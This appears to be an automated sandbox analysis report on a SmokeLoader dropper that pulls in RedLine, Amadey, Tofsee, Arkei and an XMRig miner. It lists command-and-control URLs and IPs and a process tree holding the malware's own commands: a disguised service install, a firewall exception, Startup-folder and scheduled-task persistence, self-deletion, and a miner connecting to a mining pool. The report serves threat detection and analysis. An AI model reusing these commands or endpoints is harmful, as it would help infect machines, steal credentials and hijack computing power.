Analysis

  • max time kernel
    152s
  • max time network
    152s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    20-12-2021 05:57

General

  • Target

    69e2ec2c13df7b42f74c079fe7416ee2.exe

  • Size

    323KB

  • MD5

    69e2ec2c13df7b42f74c079fe7416ee2

  • SHA1

    ed0f32eaaf6a16cbeb9458addd8dd6986045f772

  • SHA256

    8b2d28cadf36d5fc43cc753d1988a749f8abc57e2858c7367b9b20ef0269d045

  • SHA512

    53483545154b69d752beac2a84fee59e86e621a8aa51fe8b380b5c648a37f6dc86b54e5ad7a8148a8e0b302aebc2088de8ea6ffcf18d58a5ce9f427681a6e6bc

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://host-data-coin-11.com/

http://file-coin-host-12.com/

http://srtuiyhuali.at/

http://fufuiloirtu.com/

http://amogohuigotuli.at/

http://novohudosovu.com/

http://brutuilionust.com/

http://bubushkalioua.com/

http://dumuilistrati.at/

http://verboliatsiaeeees.com/

rc4.i32
rc4.i32
rc4.i32
rc4.i32

Extracted

Family

tofsee

C2

mubrikych.top

oxxyfix.xyz

Extracted

Family

redline

Botnet

1

C2

86.107.197.138:38133

Extracted

Family

amadey

Version

2.86

C2

185.215.113.35/d2VxjasuwS/index.php

Extracted

Family

redline

Botnet

install

C2

62.182.156.187:56323

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Arkei

    Arkei is an infostealer written in C++.

  • Gozi RM3

    A heavily modified version of Gozi using RM3 loader.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 9 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Windows security bypass 2 TTPs
  • suricata: ET MALWARE Amadey CnC Check-In

    suricata: ET MALWARE Amadey CnC Check-In

  • suricata: ET MALWARE Sharik/Smoke CnC Beacon 11

    suricata: ET MALWARE Sharik/Smoke CnC Beacon 11

  • suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)

    suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Arkei Stealer Payload 2 IoCs
  • XMRig Miner Payload 1 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 15 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Sets service image path in registry 2 TTPs
  • VMProtect packed file 2 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Deletes itself 1 IoCs
  • Loads dropped DLL 10 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 9 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Modifies data under HKEY_USERS 10 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\69e2ec2c13df7b42f74c079fe7416ee2.exe
    "C:\Users\Admin\AppData\Local\Temp\69e2ec2c13df7b42f74c079fe7416ee2.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:1088
    • C:\Users\Admin\AppData\Local\Temp\69e2ec2c13df7b42f74c079fe7416ee2.exe
      "C:\Users\Admin\AppData\Local\Temp\69e2ec2c13df7b42f74c079fe7416ee2.exe"
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:1220
  • C:\Users\Admin\AppData\Local\Temp\15F1.exe
    C:\Users\Admin\AppData\Local\Temp\15F1.exe
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:1156
    • C:\Users\Admin\AppData\Local\Temp\15F1.exe
      C:\Users\Admin\AppData\Local\Temp\15F1.exe
      2⤵
      • Executes dropped EXE
      • Checks SCSI registry key(s)
      • Suspicious behavior: MapViewOfSection
      PID:1660
  • C:\Users\Admin\AppData\Local\Temp\6FA5.exe
    C:\Users\Admin\AppData\Local\Temp\6FA5.exe
    1⤵
    • Executes dropped EXE
    • Checks SCSI registry key(s)
    • Suspicious behavior: MapViewOfSection
    PID:1208
  • C:\Users\Admin\AppData\Local\Temp\CEF5.exe
    C:\Users\Admin\AppData\Local\Temp\CEF5.exe
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    • Checks processor information in registry
    PID:1596
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\CEF5.exe" & exit
      2⤵
        PID:2272
        • C:\Windows\SysWOW64\timeout.exe
          timeout /t 5
          3⤵
          • Delays execution with timeout.exe
          PID:2332
    • C:\Users\Admin\AppData\Local\Temp\D443.exe
      C:\Users\Admin\AppData\Local\Temp\D443.exe
      1⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:1832
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\uutjdsdq\
        2⤵
          PID:1780
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\bytvlbna.exe" C:\Windows\SysWOW64\uutjdsdq\
          2⤵
            PID:852
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\System32\sc.exe" create uutjdsdq binPath= "C:\Windows\SysWOW64\uutjdsdq\bytvlbna.exe /d\"C:\Users\Admin\AppData\Local\Temp\D443.exe\"" type= own start= auto DisplayName= "wifi support"
            2⤵
              PID:1224
            • C:\Windows\SysWOW64\sc.exe
              "C:\Windows\System32\sc.exe" description uutjdsdq "wifi internet conection"
              2⤵
                PID:1584
              • C:\Windows\SysWOW64\sc.exe
                "C:\Windows\System32\sc.exe" start uutjdsdq
                2⤵
                  PID:1532
                • C:\Windows\SysWOW64\netsh.exe
                  "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                  2⤵
                    PID:588
                • C:\Users\Admin\AppData\Local\Temp\E296.exe
                  C:\Users\Admin\AppData\Local\Temp\E296.exe
                  1⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of SetThreadContext
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:1536
                  • C:\Users\Admin\AppData\Local\Temp\E296.exe
                    C:\Users\Admin\AppData\Local\Temp\E296.exe
                    2⤵
                    • Executes dropped EXE
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1620
                • C:\Users\Admin\AppData\Local\Temp\EE91.exe
                  C:\Users\Admin\AppData\Local\Temp\EE91.exe
                  1⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  PID:1088
                  • C:\Users\Admin\AppData\Local\Temp\60bb09348e\tkools.exe
                    "C:\Users\Admin\AppData\Local\Temp\60bb09348e\tkools.exe"
                    2⤵
                    • Executes dropped EXE
                    PID:1684
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\60bb09348e\
                      3⤵
                        PID:1532
                        • C:\Windows\SysWOW64\reg.exe
                          REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\60bb09348e\
                          4⤵
                            PID:1728
                        • C:\Windows\SysWOW64\schtasks.exe
                          "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN tkools.exe /TR "C:\Users\Admin\AppData\Local\Temp\60bb09348e\tkools.exe" /F
                          3⤵
                          • Creates scheduled task(s)
                          PID:956
                    • C:\Users\Admin\AppData\Local\Temp\F44C.exe
                      C:\Users\Admin\AppData\Local\Temp\F44C.exe
                      1⤵
                      • Executes dropped EXE
                      • Suspicious use of AdjustPrivilegeToken
                      PID:832
                    • C:\Windows\SysWOW64\uutjdsdq\bytvlbna.exe
                      C:\Windows\SysWOW64\uutjdsdq\bytvlbna.exe /d"C:\Users\Admin\AppData\Local\Temp\D443.exe"
                      1⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:1480
                      • C:\Windows\SysWOW64\svchost.exe
                        svchost.exe
                        2⤵
                        • Drops file in System32 directory
                        • Suspicious use of SetThreadContext
                        • Modifies data under HKEY_USERS
                        PID:628
                        • C:\Windows\SysWOW64\svchost.exe
                          svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
                          3⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2132
                    • C:\Users\Admin\AppData\Local\Temp\241.exe
                      C:\Users\Admin\AppData\Local\Temp\241.exe
                      1⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious use of SetThreadContext
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1476
                      • C:\Users\Admin\AppData\Local\Temp\241.exe
                        C:\Users\Admin\AppData\Local\Temp\241.exe
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2024
                    • C:\Users\Admin\AppData\Local\Temp\1A68.exe
                      C:\Users\Admin\AppData\Local\Temp\1A68.exe
                      1⤵
                      • Executes dropped EXE
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      • Suspicious use of SetThreadContext
                      PID:1384
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                        2⤵
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2444
                    • C:\Windows\SysWOW64\explorer.exe
                      C:\Windows\SysWOW64\explorer.exe
                      1⤵
                      • Accesses Microsoft Outlook profiles
                      • outlook_office_path
                      • outlook_win_path
                      PID:1728
                    • C:\Windows\explorer.exe
                      C:\Windows\explorer.exe
                      1⤵
                        PID:956
                      • C:\Windows\system32\taskeng.exe
                        taskeng.exe {13F90DC8-F956-49F4-B2A3-6B568CFE59A1} S-1-5-21-3846991908-3261386348-1409841751-1000:VQVVOAJK\Admin:Interactive:[1]
                        1⤵
                          PID:2368
                          • C:\Users\Admin\AppData\Local\Temp\60bb09348e\tkools.exe
                            C:\Users\Admin\AppData\Local\Temp\60bb09348e\tkools.exe
                            2⤵
                            • Executes dropped EXE
                            PID:2400

                        Network

                        MITRE ATT&CK Enterprise v6

                        Replay Monitor

                        Loading Replay Monitor...

                        Downloads

                        • memory/628-152-0x00000000000C0000-0x00000000000D5000-memory.dmp

                          Filesize

                          84KB

                        • memory/628-153-0x00000000000C0000-0x00000000000D5000-memory.dmp

                          Filesize

                          84KB

                        • memory/832-133-0x0000000000570000-0x0000000000593000-memory.dmp

                          Filesize

                          140KB

                        • memory/832-115-0x0000000000870000-0x00000000008A8000-memory.dmp

                          Filesize

                          224KB

                        • memory/832-132-0x0000000002611000-0x0000000002612000-memory.dmp

                          Filesize

                          4KB

                        • memory/832-142-0x0000000002614000-0x0000000002615000-memory.dmp

                          Filesize

                          4KB

                        • memory/832-122-0x0000000000350000-0x0000000000351000-memory.dmp

                          Filesize

                          4KB

                        • memory/832-119-0x00000000005A0000-0x00000000005DA000-memory.dmp

                          Filesize

                          232KB

                        • memory/832-211-0x0000000002619000-0x000000000262A000-memory.dmp

                          Filesize

                          68KB

                        • memory/832-110-0x0000000000330000-0x0000000000331000-memory.dmp

                          Filesize

                          4KB

                        • memory/832-111-0x0000000000400000-0x0000000000523000-memory.dmp

                          Filesize

                          1.1MB

                        • memory/832-109-0x0000000000400000-0x0000000000523000-memory.dmp

                          Filesize

                          1.1MB

                        • memory/832-135-0x0000000002612000-0x0000000002613000-memory.dmp

                          Filesize

                          4KB

                        • memory/956-217-0x00000000000F0000-0x00000000000F7000-memory.dmp

                          Filesize

                          28KB

                        • memory/956-218-0x00000000000E0000-0x00000000000EC000-memory.dmp

                          Filesize

                          48KB

                        • memory/1088-162-0x0000000000400000-0x00000000004D6000-memory.dmp

                          Filesize

                          856KB

                        • memory/1088-145-0x000000000066B000-0x0000000000689000-memory.dmp

                          Filesize

                          120KB

                        • memory/1088-58-0x0000000000220000-0x0000000000229000-memory.dmp

                          Filesize

                          36KB

                        • memory/1088-161-0x0000000000250000-0x0000000000288000-memory.dmp

                          Filesize

                          224KB

                        • memory/1088-54-0x000000000059B000-0x00000000005AB000-memory.dmp

                          Filesize

                          64KB

                        • memory/1156-62-0x000000000067B000-0x000000000068B000-memory.dmp

                          Filesize

                          64KB

                        • memory/1208-72-0x000000000024B000-0x000000000025C000-memory.dmp

                          Filesize

                          68KB

                        • memory/1208-74-0x00000000003A0000-0x00000000003A9000-memory.dmp

                          Filesize

                          36KB

                        • memory/1208-75-0x0000000000400000-0x00000000004CD000-memory.dmp

                          Filesize

                          820KB

                        • memory/1220-55-0x0000000000400000-0x0000000000409000-memory.dmp

                          Filesize

                          36KB

                        • memory/1220-57-0x0000000076C61000-0x0000000076C63000-memory.dmp

                          Filesize

                          8KB

                        • memory/1384-179-0x0000000000100000-0x0000000000101000-memory.dmp

                          Filesize

                          4KB

                        • memory/1384-184-0x0000000000120000-0x0000000000121000-memory.dmp

                          Filesize

                          4KB

                        • memory/1384-174-0x00000000000F0000-0x00000000000F1000-memory.dmp

                          Filesize

                          4KB

                        • memory/1384-175-0x00000000000F0000-0x00000000000F1000-memory.dmp

                          Filesize

                          4KB

                        • memory/1384-176-0x0000000000100000-0x0000000000101000-memory.dmp

                          Filesize

                          4KB

                        • memory/1384-182-0x0000000000110000-0x0000000000111000-memory.dmp

                          Filesize

                          4KB

                        • memory/1384-173-0x00000000000F0000-0x00000000000F1000-memory.dmp

                          Filesize

                          4KB

                        • memory/1384-200-0x0000000000150000-0x0000000000151000-memory.dmp

                          Filesize

                          4KB

                        • memory/1384-185-0x0000000000120000-0x0000000000121000-memory.dmp

                          Filesize

                          4KB

                        • memory/1384-177-0x0000000000100000-0x0000000000101000-memory.dmp

                          Filesize

                          4KB

                        • memory/1384-187-0x0000000000130000-0x0000000000131000-memory.dmp

                          Filesize

                          4KB

                        • memory/1384-181-0x0000000000110000-0x0000000000111000-memory.dmp

                          Filesize

                          4KB

                        • memory/1384-188-0x0000000000130000-0x0000000000131000-memory.dmp

                          Filesize

                          4KB

                        • memory/1404-69-0x0000000003890000-0x00000000038A6000-memory.dmp

                          Filesize

                          88KB

                        • memory/1404-59-0x0000000002730000-0x0000000002746000-memory.dmp

                          Filesize

                          88KB

                        • memory/1404-76-0x0000000004080000-0x0000000004096000-memory.dmp

                          Filesize

                          88KB

                        • memory/1476-143-0x0000000001FA0000-0x0000000001FA1000-memory.dmp

                          Filesize

                          4KB

                        • memory/1476-140-0x0000000000170000-0x0000000000171000-memory.dmp

                          Filesize

                          4KB

                        • memory/1476-144-0x0000000000600000-0x0000000000601000-memory.dmp

                          Filesize

                          4KB

                        • memory/1480-164-0x0000000000400000-0x00000000004D1000-memory.dmp

                          Filesize

                          836KB

                        • memory/1480-148-0x00000000005BB000-0x00000000005CC000-memory.dmp

                          Filesize

                          68KB

                        • memory/1536-95-0x0000000004AE0000-0x0000000004AE1000-memory.dmp

                          Filesize

                          4KB

                        • memory/1536-87-0x00000000010E0000-0x00000000010E1000-memory.dmp

                          Filesize

                          4KB

                        • memory/1536-96-0x0000000000320000-0x0000000000321000-memory.dmp

                          Filesize

                          4KB

                        • memory/1596-86-0x0000000000400000-0x00000000004D2000-memory.dmp

                          Filesize

                          840KB

                        • memory/1596-85-0x00000000003B0000-0x00000000003CC000-memory.dmp

                          Filesize

                          112KB

                        • memory/1596-81-0x000000000095B000-0x000000000096C000-memory.dmp

                          Filesize

                          68KB

                        • memory/1620-130-0x0000000000400000-0x0000000000420000-memory.dmp

                          Filesize

                          128KB

                        • memory/1620-125-0x0000000000400000-0x0000000000420000-memory.dmp

                          Filesize

                          128KB

                        • memory/1620-124-0x0000000000400000-0x0000000000420000-memory.dmp

                          Filesize

                          128KB

                        • memory/1620-126-0x0000000000400000-0x0000000000420000-memory.dmp

                          Filesize

                          128KB

                        • memory/1620-127-0x0000000000400000-0x0000000000420000-memory.dmp

                          Filesize

                          128KB

                        • memory/1620-121-0x0000000000400000-0x0000000000420000-memory.dmp

                          Filesize

                          128KB

                        • memory/1620-163-0x0000000000F70000-0x0000000000F71000-memory.dmp

                          Filesize

                          4KB

                        • memory/1684-208-0x0000000000400000-0x00000000004D6000-memory.dmp

                          Filesize

                          856KB

                        • memory/1728-216-0x00000000000C0000-0x000000000012B000-memory.dmp

                          Filesize

                          428KB

                        • memory/1728-215-0x0000000000130000-0x00000000001A4000-memory.dmp

                          Filesize

                          464KB

                        • memory/1832-89-0x000000000067B000-0x000000000068C000-memory.dmp

                          Filesize

                          68KB

                        • memory/1832-93-0x0000000000220000-0x0000000000233000-memory.dmp

                          Filesize

                          76KB

                        • memory/1832-94-0x0000000000400000-0x00000000004D1000-memory.dmp

                          Filesize

                          836KB

                        • memory/2024-165-0x0000000000400000-0x0000000000420000-memory.dmp

                          Filesize

                          128KB

                        • memory/2024-178-0x00000000005B0000-0x00000000005B1000-memory.dmp

                          Filesize

                          4KB

                        • memory/2024-169-0x0000000000400000-0x0000000000420000-memory.dmp

                          Filesize

                          128KB

                        • memory/2400-239-0x0000000000400000-0x00000000004D6000-memory.dmp

                          Filesize

                          856KB

                        • memory/2444-251-0x00000000004C0000-0x00000000004C1000-memory.dmp

                          Filesize

                          4KB